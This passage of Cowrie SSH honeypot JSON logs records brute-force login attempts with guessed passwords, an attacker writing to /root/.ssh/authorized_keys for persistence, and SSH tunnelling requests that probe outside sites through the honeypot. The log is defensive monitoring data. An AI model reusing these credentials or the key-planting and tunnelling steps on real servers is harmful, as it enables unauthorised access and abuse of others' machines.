~","sensor":"my-vps","timestamp":"2025-08-31T06:15:52.108768Z","src_ip":"212.227.235.229","session":"a9f1ea6d057a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:15:52.406138Z","src_ip":"212.227.235.229","session":"a9f1ea6d057a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:52.407096Z","src_ip":"212.227.235.229","session":"a9f1ea6d057a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41708,"dst_ip":"1.2.3.4","dst_port":22,"session":"13deca9c1fa8","protocol":"ssh","message":"New connection: 212.227.235.229:41708 (1.2.3.4:22) [session: 13deca9c1fa8]","sensor":"my-vps","timestamp":"2025-08-31T06:15:52.693634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:15:52.694366Z","src_ip":"212.227.235.229","session":"13deca9c1fa8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:15:52.976463Z","src_ip":"212.227.235.229","session":"13deca9c1fa8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:15:54.147249Z","src_ip":"212.227.235.229","session":"13deca9c1fa8"}
{"eventid":"cowrie.login.failed","username":"test4","password":"root123","message":"login attempt [test4/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:15:54.423162Z","src_ip":"212.227.235.229","session":"a680d8a61383"}
{"eventid":"cowrie.session.connect","src_ip":"194.0.234.21","src_port":40090,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ecdcc5afead","protocol":"ssh","message":"New connection: 194.0.234.21:40090 (1.2.3.4:22) [session: 1ecdcc5afead]","sensor":"my-vps","timestamp":"2025-08-31T06:15:54.875084Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-31T06:15:54.876091Z","src_ip":"194.0.234.21","session":"1ecdcc5afead"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-31T06:15:54.893595Z","src_ip":"194.0.234.21","session":"1ecdcc5afead"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123123","message":"login attempt [root/Aa123123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:15:54.976055Z","src_ip":"194.0.234.21","session":"1ecdcc5afead"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:55.432450Z","src_ip":"212.227.235.229","session":"13deca9c1fa8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42704,"dst_ip":"1.2.3.4","dst_port":22,"session":"106de91db15e","protocol":"ssh","message":"New connection: 212.227.235.229:42704 (1.2.3.4:22) [session: 106de91db15e]","sensor":"my-vps","timestamp":"2025-08-31T06:15:55.700597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:15:55.701643Z","src_ip":"212.227.235.229","session":"106de91db15e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:15:55.976695Z","src_ip":"212.227.235.229","session":"106de91db15e"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:56.273667Z","src_ip":"212.227.235.229","session":"a680d8a61383"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"52.208.26.198","dst_port":443,"src_ip":"194.0.234.21","src_port":50972,"message":"direct-tcp connection request to 52.208.26.198:443 from 127.0.0.1:50972","sensor":"my-vps","timestamp":"2025-08-31T06:15:56.385381Z","session":"1ecdcc5afead"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"52.208.26.198","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xd9\\xb8\\xf5\\x80uj\\x07[\\x81\\xceb\\xb4\\x95{\\xd6\\xdd=\\x97\\xad\\x1c\\x80o\\x8b)\\xbc7\\xdfr\\x9c\\xa5\\x8d\\xba \\xc4\\x8e7\\x0f?lWs9\\xb2\\xd3S4\\xb7\\x18\\xe1\\xc8\\x98+\\x0e-\\xcc\\xfd+\\xeei\\xd6K\\x96Bq\\x81\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xe0\\n\\xd1\\x83\\r\\x8a\\x1a\\xdf\\xedMN\\x82\\tZ\\x04#\\x8cY\\xe7]\\xca\\xaexj9\\x03{\\x04\\xbf.`\\x1a\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 52.208.26.198:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xd9\\xb8\\xf5\\x80uj\\x07[\\x81\\xceb\\xb4\\x95{\\xd6\\xdd=\\x97\\xad\\x1c\\x80o\\x8b)\\xbc7\\xdfr\\x9c\\xa5\\x8d\\xba \\xc4\\x8e7\\x0f?lWs9\\xb2\\xd3S4\\xb7\\x18\\xe1\\xc8\\x98+\\x0e-\\xcc\\xfd+\\xeei\\xd6K\\x96Bq\\x81\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xe0\\n\\xd1\\x83\\r\\x8a\\x1a\\xdf\\xedMN\\x82\\tZ\\x04#\\x8cY\\xe7]\\xca\\xaexj9\\x03{\\x04\\xbf.`\\x1a\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T06:15:56.429710Z","src_ip":"194.0.234.21","session":"1ecdcc5afead"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"104.76.24.222","dst_port":443,"src_ip":"194.0.234.21","src_port":51102,"message":"direct-tcp connection request to 104.76.24.222:443 from 127.0.0.1:51102","sensor":"my-vps","timestamp":"2025-08-31T06:15:56.519593Z","session":"1ecdcc5afead"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"104.76.24.222","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xd7\\xacc\\xbf\\xef\\x15\\x80!\\xee!G]\\xbf}\\xb2j\\x8fK+\\xae\\x0eR\\x10\\xa8\\x983\\xdb\\x13\\rF\\x99\\xb3 \\xf8\\x0fh\\x06\\xcd`q`ws\\x85\\xe2\\xe5<\\xd4\\x9c\\xfd\\x86\\xee\\xc8\\xa6\\xa0\\xdd\\xe62d\\xc8\\x0f\\xfeS\\xc0\\xdd\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 .E\\x92Z\\xaa\\xc9)t\\xcf\\xe0\\xc4\\xdc\\xc4\\xc9\\x7f\\x80g\\x112\\xd3\\xb3\\xf2\\xcc\\x95)\\xf2\\xc3\\xb0o\\xcf\\xad\\t\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,"message":"discarded direct-tcp forward request 1 to 104.76.24.222:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xd7\\xacc\\xbf\\xef\\x15\\x80!\\xee!G]\\xbf}\\xb2j\\x8fK+\\xae\\x0eR\\x10\\xa8\\x983\\xdb\\x13\\rF\\x99\\xb3 \\xf8\\x0fh\\x06\\xcd`q`ws\\x85\\xe2\\xe5<\\xd4\\x9c\\xfd\\x86\\xee\\xc8\\xa6\\xa0\\xdd\\xe62d\\xc8\\x0f\\xfeS\\xc0\\xdd\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 .E\\x92Z\\xaa\\xc9)t\\xcf\\xe0\\xc4\\xdc\\xc4\\xc9\\x7f\\x80g\\x112\\xd3\\xb3\\xf2\\xcc\\x95)\\xf2\\xc3\\xb0o\\xcf\\xad\\t\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T06:15:56.555598Z","src_ip":"194.0.234.21","session":"1ecdcc5afead"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.203.132","dst_port":443,"src_ip":"194.0.234.21","src_port":51218,"message":"direct-tcp connection request to 142.250.203.132:443 from 127.0.0.1:51218","sensor":"my-vps","timestamp":"2025-08-31T06:15:56.619266Z","session":"1ecdcc5afead"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.203.132","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xc5\\xcc\\xcen\\xf4\\x12@!\\x05E\\xba|Y\\x8e\\xd1\\xe2\\xd43?\\x97\\xf2\\xf2\\x9f\\xecs\\xffm\\xbf\\x82\\xe5\\x9c\\x94 \\xce\\x11\\t4M\\xd9\\xaad\\xffD\\x0ct@\\xa6I\\xb2g\\xab\\n*2E\\xac!\\xd1\\x9d\\xbc\\x92\\x90v\\xc8\\x16\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 